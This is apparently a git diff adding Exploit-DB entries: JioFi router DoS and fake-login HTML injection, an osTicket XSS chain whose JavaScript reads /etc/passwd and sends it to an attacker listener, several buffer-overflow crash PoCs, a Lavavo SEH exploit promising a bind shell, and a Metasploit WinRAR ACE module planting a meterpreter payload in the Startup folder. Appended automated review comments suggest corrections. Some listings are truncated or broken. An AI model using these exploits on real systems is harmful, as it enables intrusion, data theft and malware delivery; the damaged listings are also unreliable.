diff --git a/exploits/hardware/dos/46752.txt b/exploits/hardware/dos/46752.txt new file mode 100644 index 000000000..a6cfd636b --- /dev/null +++ b/exploits/hardware/dos/46752.txt 
@@ -0,0 +1,66 @@ +# Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices allows a DoS (Hang) via the mask POST parameter +# Exploit Author: Vikas Chaudhary +# Date: 21-01-2019 +# Vendor Homepage: https://www.jio.com/ +# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29 +# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router +# Category: Hardware +# Contact: https://www.facebook.com/profile.php?id=100011287630308 +# Web: https://gkaim.com/ +# Tested on: Windows 10 X64- Firefox-65.0 +# CVE-2019-7439 +*********************************************************************** +## Vulnerability Description :- A denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled. 
+---------------------------------------- +# Proof Of Concept: +1- First Open BurpSuite +2- Make Intercept on +3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ] +4-Capture the data and then Spider the Host +5- Now You find a Link like this [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ] +6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo&mask=0&token=0 ] +7-Vulnerable parameter is => mash +8-Paste this PAYLOD in mask parameter and then show Response in browser +Payload => + + + +9-Now it will show => {"commit":"Socket Connect Error"} +10-- It Means Router is Completely Stopped , +---------------------------------------- +Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter +----------------------------------------- +Solution:- + +You have to Remove your battery and then again insert it to make Normal. +----------------------------------------------------------------------------------- +REQUEST +------------ +POST /cgi-bin/qcmap_web_cgi HTTP/1.1 +Host: 192.168.225.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 +Accept: text/plain, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.225.1/ +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 167 +Connection: close + +Page=GetWANInfo&mask=&token=0 + +**************************** +RESPONSE +---------- +HTTP/1.1 200 OK +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +X-Frame-Options: SAMEORIGIN +connection: close +Content-Type: text/html +Content-Length: 33 +Date: Mon, 21 Jan 2019 18:17:34 GMT +Server: lighttpd/1.4.35 + +{"commit":"Socket Connect Error"} +--------------------------------------------------------------------------------------------------------------- \ No newline at end of file 
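Review bot: the `Payload =>` line in this hunk is empty and the request body reads `Page=GetWANInfo&mask=&token=0`, yet the request carries `Content-Length: 167`, so the payload was stripped and the PoC as published cannot be reproduced or verified; either restore the value or state that it was omitted. Step 7 names the parameter `mash` where the request uses `mask`, `repeter` should be `repeater`, and `PAYLOD` should be `PAYLOAD`. The Solution section only describes pulling the battery to recover the device; since CVE-2019-7439 is cited, the advisory should record whether the vendor was contacted and whether a firmware fix exists, so readers can tell that the exposure is otherwise unmitigated. The `{"commit":"Socket Connect Error"}` response with `Server: lighttpd/1.4.35` is the only observable given; adding the state of the device (does the web UI, DHCP, or the cellular link stop?) would help operators recognise the condition in the field.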
diff --git a/exploits/hardware/webapps/46751.txt b/exploits/hardware/webapps/46751.txt new file mode 100644 index 000000000..4c9b7e073 --- /dev/null +++ b/exploits/hardware/webapps/46751.txt 
@@ -0,0 +1,63 @@ +# Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter. +# Exploit Author: Vikas Chaudhary +# Date: 21-01-2019 +# Vendor Homepage: https://www.jio.com/ +# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29 +# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router +# Category: Hardware +# Contact: https://www.facebook.com/profile.php?id=100011287630308 +# Web: https://gkaim.com/ +# Tested on: Windows 10 X64- Firefox-65.0 +# CVE-2019-7438 +*********************************************************************** +## Vulnerability Description => HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute Javascript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust. +---------------------------------------- +# Proof Of ConceptoC +1- First Open BurpSuite +2- Make Intercept on +3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ] +4-Capture the data and then Spider the Host +5- Now You find a Link like like this [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ] +6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo&mask=0&token=0 ] +7-Vulnerable parameter is => mash +8-Paste this PAYLOAD in mask parameter and then show Response in browser +Payload => + +

Please login with valid credentials:- It's A Fake Login Page
Username:
Password:

+ +9- You will see a fake Login page on the screen - +---------------------------------------------------------------------------------- +Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter - +---------------------------------------------------------------------------------- +REQUEST +------------------- +POST /cgi-bin/qcmap_web_cgi HTTP/1.1 +Host: 192.168.225.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 +Accept: text/plain, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.225.1/ +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 550 +Connection: close + +Page=GetWANInfo&mask=

Please login with valid credentials:- It's A Fake Login Page
Username:
Password:

&token=0 + +**************************** +RESPONSE +----------------- + +HTTP/1.1 200 OK +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +X-Frame-Options: SAMEORIGIN +connection: close +Content-Type: text/html +Content-Length: 1167 +Date: Mon, 21 Jan 2019 18:02:07 GMT +Server: lighttpd/1.4.35 + +{"Page":"GetWANInfo","Mask":"

Please login with valid credentials:- It's A Fake Login Page
Username:
Password:

","wan_status":"On","total_data_used":"10005648","wan_operation_mode":"NAT","wan_connection_mode":"DHCP","wan_mac":"40:C8:CB:07:2C:8A","host_name":"JMR1140-072C8A","multi_pdn":"Disabled","ipv4_addr":"10.153.220.101","ipv4_subnet":"255.255.255.252","ipv4_gateway":"10.153.220.102","ipv4_primary":"49.45.0.1","ipv4_secondary":"0.0.0.0","ipv6_addr":"2409:4060:218e:b511:89ec:3214:def1:f75b","ipv6_subnet":"64","ipv6_gateway":"fe80::c9b3:928a:5eca:7e1c","ipv6_primary":"2405:200:800::1","ipv6_secondary":"::","channel":"automatic","packet_loss":"0 / 0","total_data_used_dlink":"5.11 MB","total_data_used_ulink":"4.37 MB"} + +--------------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/46753.txt b/exploits/php/webapps/46753.txt new file mode 100644 index 000000000..4c28e2184 --- /dev/null +++ b/exploits/php/webapps/46753.txt 
@@ -0,0 +1,107 @@ +# Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File +Inclusion +# Date: 09.04.2019 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) @ehakkus +# Contact: https://pentest.com.tr +# Vendor Homepage: https://osticket.com +# Software Link: https://github.com/osTicket/osTicket +# References: https://github.com/osTicket/osTicket/pull/4869 +# https://pentest.com.tr/exploits/osTicket-v1-11-XSS-to-LFI.html +# Version: v1.11 +# Category: Webapps +# Tested on: XAMPP for Linux +# Description: This is exploit proof of concept as XSS attempt can +# lead to an LFI (Local File Inclusion) attack at osTicket. +################################################################## +# PoC + +# There are two different XSS vulnerabilities in the "Import" +field on the Agent Panel - User Directory field. This vulnerability +causes a different vulnerability. The attacker can run the malicious +JS file that he uploads in the XSS vulnerability. Uploaded JS files +can be called clear text. Therefore, attackers do not have to use +a different server to perform an attack. Then it is possible to +create "Local File Inclusion" vulnerability too. + +The attacker can upload a JS file as follows. 
+------------------------------------------------------------------ + +function readTextFile(file) +{ + var rawFile = new XMLHttpRequest(); + rawFile.open("GET", file, false); + rawFile.onreadystatechange = function () + { + if(rawFile.readyState === 4) + { + if(rawFile.status === 200 || rawFile.status == 0) + { + var allText = rawFile.responseText; + allText.src = 'http://localhost:8001' + +rawFile.responseText; + document.body.appendChild(allText); + } + } + } + rawFile.send(null); +} + +readTextFile("/etc/passwd"); + +------------------------------------------------------------------ + +# Smilar JS File Link; + +/upload/file.php?key=y3cxcoxqv8r3miqczzj5ar8rhm1bhcbm +&expires=1554854400&signature=be5cea87c37d7971e0c54164090a391066ecbaca&id=36" + +After this process, we can run the JS file in XSS vulnerability. + + +# Our First Request for XSS to LFI; +------------------------------------------------------------------ + +POST /upload/scp/users.php?do=import-users +Host: localhost +Content-Type: multipart/form-data; boundary=---------------------------[] + + +-----------------------------[] +Content-Disposition: form-data; name="__CSRFToken__" + +8f6f85b8d76218112a53f909692f3c4ae7768b39 +-----------------------------[] +Content-Disposition: form-data; name="pasted" + + +-----------------------------[] +Content-Disposition: form-data; name="import"; filename="users-20190408.csv" +Content-Type: text/csv + + + +-----------------------------[]-- + + + + +# Our Second Request for XSS to LFI; +------------------------------------------------------------------ +POST /upload/scp/ajax.php/users/import HTTP/1.1 +Host: localhost + +__CSRFToken__=8f6f85b8d76218112a53f909692f3c4ae7768b39&pasted=%3Cscript+src%3D%22http%3A%2F%2Flocalhost%2F4%2FosTicket-v1.11%2Fupload%2Ffile.php%3Fkey%3Dy3cxcoxqv8r3miqczzj5ar8rhm1bhcbm%26expires%3D1554854400%26signature%3Dbe5cea87c37d7971e0c54164090a391066ecbaca%26id%3D36%22%3E%3C%2Fscript%3E&undefined=Import+Users 
+------------------------------------------------------------------ + + +# After sending XSS requests, +# When the attacker listens to port 8001, he/she will receive a request as +follows. + +root@AkkuS:~# python -m SimpleHTTPServer 8001 +Serving HTTP on 0.0.0.0 port 8001 ... +127.0.0.1 - - [09/Apr/2019 11:54:42] "GET / HTTP/1.1" 200 - +127.0.0.1 - - [09/Apr/2019 11:54:42] "GET +/root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin...[More] \ No newline at end of file diff --git a/exploits/windows/dos/46749.py b/exploits/windows/dos/46749.py new file mode 100755 index 000000000..b4db7b83f --- /dev/null +++ b/exploits/windows/dos/46749.py @@ -0,0 +1,24 @@ +#Exploit Title: HeidiSQL Portable 10.1.0.5464 - Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2019-04-24 +#Vendor Homepage: https://www.heidisql.com/ +#Software Link: https://www.heidisql.com/downloads/releases/HeidiSQL_10.1_64_Portable.zip +#Tested Version: 10.1.0.5464 +#Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1 + +#Steps to produce the crash: +#1.- Run python code: HeidiSQL_Portable_10.1.0.5464.py +#2.- Open bd_p.txt and copy content to clipboard +#2.- Open HeidiSQL +#3.- Select "New" +#4.- In Network type select "Microsoft SQL Server (TCP/IP)" +#5.- Enable "Prompt for credentials" > click on "Open" +#6.- In Login select "Password" and Paste ClipBoard +#6.- Click on "Login" +#7.- Crashed + +cod = "\x41" * 2000 + +f = open('bd_p.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46750.py b/exploits/windows/dos/46750.py new file mode 100755 index 000000000..1b810d47e --- /dev/null +++ b/exploits/windows/dos/46750.py 
@@ -0,0 +1,23 @@ +#Exploit Title: Backup Key Recovery 2.2.4 - 'Name' Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2019-04-24 +#Vendor Homepage: www.nsauditor.com +#Software Link: http://www.nsauditor.com/downloads/backeyrecovery_setup.exe +#Tested Version: 2.2.4 +#Tested on: Windows 7 x64 Service Pack 1 + +#Steps to produce the crash: +#1.- Run python code: Backup_key_rec_2.2.4.py +#2.- Open backup.txt and copy content to clipboard +#3.- Open Backup Key Recovery +#4.- Select "Register" +#5.- In "Name" paste Clipboard +#6.- In Key type "test" +#7.- Click "Ok" +#8.- Crarshed + +cod = "\x41" * 300 + +f = open('backup.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46754.py b/exploits/windows/dos/46754.py new file mode 100755 index 000000000..4b92199fe --- /dev/null +++ b/exploits/windows/dos/46754.py @@ -0,0 +1,29 @@ +# Exploit Title: AnMing MP3 CD Burner 2.0 Local Dos Exploit +# Date: 25.04.2019 +# Vendor Homepage:http://www.ddz1977.com/ +# Software Link: https://files.downloadnow.com/s/software/10/56/16/74/anming_setup.zip?token=1556228877_063f2dc0aed064ee5d13374d8509661c&fileName=anming_setup.zip +# Exploit Author: Achilles +# Tested Version: 2.0 +# Tested on: Windows 7 x64 Sp1 +# Windows XP x86 Sp3 + + +# 1.- Run python code :AnMing.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open Anming.exe and Click 'Register' +# 4.- Paste the content of EVIL.txt into the Field: 'Your Name and Registration Code' +# 5.- Click 'OK'and you will see a crash. + + + +#!/usr/bin/env python +buffer = "\x41" * 6000 + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/local/46755.py b/exploits/windows/local/46755.py new file mode 100755 index 000000000..c9d2a1ca8 --- /dev/null 
+++ b/exploits/windows/local/46755.py 
@@ -0,0 +1,65 @@ +# Exploit Title: Lavavo CD Ripper 4.20 Local Seh Exploit +# Date: 25.04.2019 +# Vendor Homepage:https://www.lavavosoftware.com +# Software Link: https://lavavo-cd-ripper.jaleco.com/download +# Exploit Author: Achilles +# Tested Version: 4.20 +# Tested on: Windows XP SP3 EN +# Windows 7 Sp1 x64 + +# 1.- Run python code : Lavavo.py +# 2.- Open EVIL.txt and copy content to Clipboard +# 3.- Open LavavoCDRipper.exe and click UNLOCK. +# 4.- Paste the Content of EVIL.txt into the 'License Activation Name' +# 5.- License Key 123456789 +# 6.- Click 'Unlock Now' and you will have a bind shell port 3110. + +#!/usr/bin/env python +import struct + +buffer = "\x41" * 300 +nseh = "\xeb\x06\x90\x90" #jmp short 6 +seh = struct.pack(' 'RARLAB WinRAR ACE Format Input Validation Remote Code Execution', + 'Description' => %q{ + In WinRAR versions prior to and including 5.61, there is path traversal vulnerability + when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename + field is manipulated with specific patterns, the destination (extraction) folder is + ignored, thus treating the filename as an absolute path. This module will attempt to + extract a payload to the startup folder of the current user. It is limited such that + we can only go back one folder. Therefore, for this exploit to work properly, the user + must extract the supplied RAR file from one folder within the user profile folder + (e.g. Desktop or Downloads). User restart is required to gain a shell. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nadav Grossman', # exploit discovery + 'Imran E. 
Dawoodjee ' # Metasploit module + ], + 'References' => + [ + ['CVE', '2018-20250'], + ['EDB', '46552'], + ['BID', '106948'], + ['URL', 'https://research.checkpoint.com/extracting-code-execution-from-winrar/'], + ['URL', 'https://apidoc.roe.ch/acefile/latest/'], + ['URL', 'http://www.hugi.scene.org/online/coding/hugi%2012%20-%20coace.htm'], + ], + 'Platform' => 'win', + 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }, + 'Targets' => + [ + [ 'RARLAB WinRAR <= 5.61', {} ] + ], + 'DisclosureDate' => 'Feb 05 2019', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The output file name.', 'msf.ace']), + OptString.new('CUSTFILE', [ false, 'User-defined custom payload', '']), + OptString.new('FILE_LIST', [false, 'List of other non-payload files to add', '']) + ]) + + end + + def exploit + ace_header = "" + # All hex values are already in little endian. + # HEAD_CRC: Lower 2 bytes of CRC32 of 49 bytes of header after HEAD_TYPE. + # The bogus value for HEAD_CRC will be replaced later. + ace_header << "AA" + # HEAD_SIZE: header size. \x31\x00 says 49. + ace_header << "\x31\x00" + # HEAD_TYPE: header type. Archive header is 0. + ace_header << "\x00" + # HEAD_FLAGS: header flags + ace_header << "\x00\x90" + # ACE magic + ace_header << "\x2A\x2A\x41\x43\x45\x2A\x2A" + # VER_EXTRACT: version needed to extract archive + ace_header << "\x14" + # VER_CREATED: version used to create archive + ace_header << "\x14" + # HOST_CREATED: host OS for ACE used to create archive + ace_header << "\x02" + # VOLUME_NUM: which volume of a multi-volume archive? + ace_header << "\x00" + # TIME_CREATED: date and time in MS-DOS format + ace_header << "\x10\x18\x56\x4E" + # RESERVED1 + ace_header << "\x97\x4F\xF6\xAA\x00\x00\x00\x00" + # AV_SIZE: advert size + ace_header << "\x16" + # AV: advert which shows if registered/unregistered. 
+ # Full advert says "*UNREGISTERED VERSION*" + ace_header << "\x2A\x55\x4E\x52\x45\x47\x49\x53\x54\x45\x52\x45\x44\x20\x56\x45\x52\x53\x49\x4F\x4E\x2A" + + # calculate the CRC32 of ACE header, and get the lower 2 bytes + ace_header_crc32 = crc32(ace_header[4, ace_header.length]).to_s(16) + ace_header_crc16 = ace_header_crc32.last(4).to_i(base=16) + ace_header[0,2] = [ace_header_crc16].pack("v") + + # start putting the ACE file together + ace_file = "" + ace_file << ace_header + + # create headers and append file data after header + unless datastore["FILE_LIST"].empty? + print_status("Using the provided list of files @ #{datastore["FILE_LIST"]}...") + File.binread(datastore["FILE_LIST"]).each_line do |file| + file = file.chomp + file_header_and_data = create_file_header_and_data(file, false, false) + ace_file << file_header_and_data + end + end + + # autogenerated payload + if datastore["CUSTFILE"].empty? + payload_filename = "" + # 72 characters + payload_filename << "C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + # 6 characters + payload_filename << rand_text_alpha(6) + # 4 characters + payload_filename << ".exe" + payload_file_header = create_file_header_and_data(payload_filename, true, false) + # user-defined payload + else + print_status("Using a custom payload: #{::File.basename(datastore["CUSTFILE"])}") + payload_filename = "" + # 72 characters + payload_filename << "C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + # n characters + payload_filename << ::File.basename(datastore["CUSTFILE"]) + payload_file_header = create_file_header_and_data(payload_filename, true, true) + end + + vprint_status("Payload filename: #{payload_filename.from(72)}") + + # append payload file header and the payload itself into the rest of the data + ace_file << payload_file_header + # create the file + file_create(ace_file) + end + + # The CRC implementation used in ACE does not take the last step in calculating 
CRC32. + # That is, it does not flip the bits. Therefore, it can be easily calculated by taking + # the negative bitwise OR of the usual CRC and then subtracting one from it. This is due to + # the way the bitwise OR works in Ruby: unsigned integers are not a thing in Ruby, so + # applying a bitwise OR on an integer will produce its negative + 1. + def crc32(data) + table = Zlib.crc_table + crc = 0xffffffff + data.unpack('C*').each { |b| + crc = table[(crc & 0xff) ^ b] ^ (crc >> 8) + } + -(~crc) - 1 + end + + # create file headers for each file to put into the output ACE file + def create_file_header_and_data(path, is_payload, is_custom_payload) + #print_status("Length of #{path}: #{path.length}") + if is_payload and is_custom_payload + file_data = File.binread(path.from(72)) + elsif is_payload and !is_custom_payload + file_data = generate_payload_exe + else + file_data = File.binread(File.basename(path)) + end + + file_data_crc32 = crc32(file_data).to_i + + # HEAD_CRC: Lower 2 bytes of CRC32 of the next bytes of header after HEAD_TYPE. + # The bogus value for HEAD_CRC will be replaced later. + file_header = "" + file_header << "AA" + # HEAD_SIZE: file header size. + if is_payload + file_header << [31 + path.length].pack("v") + else + file_header << [31 + ::File.basename(path).length].pack("v") + end + # HEAD_TYPE: header type is 1. + file_header << "\x01" + # HEAD_FLAGS: header flags. \x01\x80 is ADDSIZE|SOLID. + file_header << "\x01\x80" + # PACK_SIZE: size when packed. + file_header << [file_data.length].pack("V") + #print_status("#{file_data.length}") + # ORIG_SIZE: original size. Same as PACK_SIZE since no compression is *truly* taking place. + file_header << [file_data.length].pack("V") + # FTIME: file date and time in MS-DOS format + file_header << "\x63\xB0\x55\x4E" + # ATTR: DOS/Windows file attribute bit field, as int, as produced by the Windows GetFileAttributes() API. 
+ file_header << "\x20\x00\x00\x00" + # CRC32: CRC32 of the compressed file + file_header << [file_data_crc32].pack("V") + # Compression type + file_header << "\x00" + # Compression quality + file_header << "\x03" + # Parameter for decompression + file_header << "\x0A\x00" + # RESERVED1 + file_header << "\x54\x45" + # FNAME_SIZE: size of filename string + if is_payload + file_header << [path.length].pack("v") + else + # print_status("#{::File.basename(path).length}") + file_header << [::File.basename(path).length].pack("v") + end + #file_header << [path.length].pack("v") + # FNAME: filename string. Empty for now. Fill in later. + if is_payload + file_header << path + else + file_header << ::File.basename(path) + end + + #print_status("Calculating other_file_header...") + file_header_crc32 = crc32(file_header[4, file_header.length]).to_s(16) + file_header_crc16 = file_header_crc32.last(4).to_i(base=16) + file_header[0,2] = [file_header_crc16].pack("v") + file_header << file_data + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a5350d891..50b42553c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -6398,6 +6398,10 @@ id,file,description,date,author,type,platform,port 46743,exploits/linux/dos/46743.txt,"systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit",2019-04-23,"Google Security Research",dos,linux, 46744,exploits/linux/dos/46744.c,"Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition",2019-04-23,"Google Security Research",dos,linux, 46745,exploits/linux/dos/46745.txt,"Linux - 'page->_refcount' Overflow via FUSE",2019-04-23,"Google Security Research",dos,linux, +46749,exploits/windows/dos/46749.py,"HeidiSQL 10.1.0.5464 - Denial of Service (PoC)",2019-04-25,"Victor Mondragón",dos,windows, +46750,exploits/windows/dos/46750.py,"Backup Key Recovery 2.2.4 - Denial of Service (PoC)",2019-04-25,"Victor Mondragón",dos,windows, +46752,exploits/hardware/dos/46752.txt,"JioFi 4G M2S 1.0.2 - Denial of Service",2019-04-25,"Vikas Chaudhary",dos,hardware, +46754,exploits/windows/dos/46754.py,"AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)",2019-04-25,Achilles,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -10438,6 +10442,8 @@ id,file,description,date,author,type,platform,port 46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows, 46742,exploits/windows/local/46742.txt,"Ross Video DashBoard 8.5.1 - Insecure Permissions",2019-04-23,LiquidWorm,local,windows, 46747,exploits/windows/local/46747.txt,"VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation",2019-04-24,"Google Security Research",local,windows, +46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows, +46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -41181,3 +41187,5 @@ id,file,description,date,author,type,platform,port 46738,exploits/php/webapps/46738.html,"74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)",2019-04-22,ax8,webapps,php,80 46739,exploits/php/webapps/46739.html,"Msvod 10 - Cross-Site Request Forgery (Change User Information)",2019-04-22,ax8,webapps,php,80 46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80 +46751,exploits/hardware/webapps/46751.txt,"JioFi 4G M2S 1.0.2 - 'mask' Cross-Site Scripting",2019-04-25,"Vikas Chaudhary",webapps,hardware, +46753,exploits/php/webapps/46753.txt,"osTicket 1.11 - Cross-Site Scripting / Local File Inclusion",2019-04-25,AkkuS,webapps,php,80
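Review bot: in the 46751 hunk the response echoes the `mask` value back verbatim inside the JSON (`{"Page":"GetWANInfo","Mask":"...`) under `Content-Type: text/html`, and that is the defect the advisory should actually name: an HTML content type on unescaped reflected input is what lets the browser render the injected markup. The Vulnerability Description paragraph is generic text about HTML injection and never ties the finding to the reflected parameter or the content type; add a sentence doing so and state the fix (HTML-escape the echoed value and serve the response as `application/json`). The payload itself is missing from the hunk (only the rendered text `Please login with valid credentials:- It's A Fake Login Page` / `Username:` / `Password:` survives), so the request shown does not match its `Content-Length: 550`. Typos: `# Proof Of ConceptoC`, `like like`, `repeter`, and `mash` for `mask`. The response body also contains the tester's own `wan_mac`, `host_name` and public IPv4/IPv6 addresses, which should be redacted before publication.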
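Review bot: the JavaScript in the 46753 hunk cannot produce the `SimpleHTTPServer` log shown at the end of that hunk: `allText` is the `responseText` string, so assigning `allText.src` has no effect, and `document.body.appendChild(allText)` throws a TypeError because a string is not a Node. The element whose `src` was meant to be set has been lost from the listing; fix the listing or the log, since defenders use the exact request pattern (`GET /root:x:0:0:...`) to write detections. The description's phrase "Uploaded JS files can be called clear text" is the root cause (an attachment served inline from the application's own origin as executable content) and should be spelled out, with a pointer to the fix in the referenced pull request https://github.com/osTicket/osTicket/pull/4869 and the standard mitigations (`Content-Disposition: attachment`, a non-script content type, serving uploads from a separate origin, and escaping the `pasted` field). Also `# Smilar JS File Link;` should read `Similar`, and that link ends with a stray `"`.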
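Review bot: in the 46749 hunk the steps are misnumbered (`2.-` and `6.-` each appear twice) and step 1 refers to `HeidiSQL_Portable_10.1.0.5464.py` although the file is committed as `46749.py`. The script uses a bare `open`/`write`/`close` on `bd_p.txt`; a `with open('bd_p.txt', 'w') as f:` block closes the file even if the write fails. The advisory gives no crash details (exception type, faulting module, whether the 2000-byte string is merely an unhandled exception in the login dialog), which triagers need to judge severity; the csv row correctly files it as a DoS PoC, and the text should say that no memory-corruption analysis was done.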
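Review bot: in the 46750 hunk step 8 reads `Crarshed` (should be `Crashed`), step 1 names `Backup_key_rec_2.2.4.py` although the committed file is `46750.py`, and the `Vendor Homepage` lacks a scheme (`www.nsauditor.com`). As with the sibling PoCs, use `with open('backup.txt', 'w') as f:` instead of an unguarded `open`/`write`/`close`, and add the observed crash details (exception, faulting module) so readers can tell an unhandled-exception DoS from a memory-safety bug.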
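Review bot: the 46754 hunk is Python 2 only (`print "..."` statements) and its `#!/usr/bin/env python` line sits after the comment block, where a shebang has no effect; move it to line 1 and switch to `print(...)` so the script also runs under Python 3. Step 2 says `EVIL.txt` but the script writes `Evil.txt` (harmless on Windows, misleading elsewhere). The bare `except:` swallows every exception and hides why the file could not be created; catch `IOError`/`OSError` and print the error. No crash details are recorded for the 6000-byte input.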
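Review bot: the 46755 hunk is truncated in this rendering at `seh = struct.pack(`; everything after the `<` format character, including the `diff --git` header, `require` lines and class declaration of `exploits/windows/local/46756.rb`, is missing, so neither the SEH chain in 46755 nor the module's requires can be reviewed here (46756 needs `zlib` for `Zlib.crc_table`). In the visible part of 46756, the `crc32` method's final expression `-(~crc) - 1` is an identity: in Ruby `~crc == -crc - 1`, so `-(~crc) - 1 == crc`, and the method just returns the unfinalized CRC (no final XOR with 0xFFFFFFFF), which is what the comment says ACE requires; the comment, though, talks about a "bitwise OR" and "negative + 1", which is neither what `~` does nor what the code computes. Replace the expression with `crc` and rewrite the comment to say "ACE omits the final XOR". The callers then do `.to_s(16).last(4).to_i(base=16)` to obtain the low 16 bits; `crc32(...) & 0xffff` gives the same value without the hex round-trip, the assignment-in-argument `base=16`, or the dependency on ActiveSupport's `String#last` (and `String#from` in `path.from(72)`). Related cleanups: the magic number 72 (length of the traversal prefix) appears three times and belongs in a constant; the `FNAME: filename string. Empty for now. Fill in later.` comment is stale since the name is appended right there; `crc32(file_data).to_i` is a no-op; the commented-out `print_status` debug lines should go; and `File.binread(File.basename(path))` for `FILE_LIST` entries reads relative to the console's working directory, which the option description should state.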
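Review bot: in the second `files_exploits.csv` hunk the 46756 row describes `RARLAB WinRAR 5.61` although the module's target is `RARLAB WinRAR <= 5.61` and its description says "versions prior to and including 5.61"; use `<= 5.61` in the csv so the affected range is searchable.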
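Review bot: in the third `files_exploits.csv` hunk the 46751 row (`JioFi 4G M2S 1.0.2 - 'mask' Cross-Site Scripting`) leaves the port field empty, while the neighbouring webapps rows carry 80 and the advisory's request targets the device's HTTP interface on `192.168.225.1`; set the port to 80 for consistency with the other webapps entries.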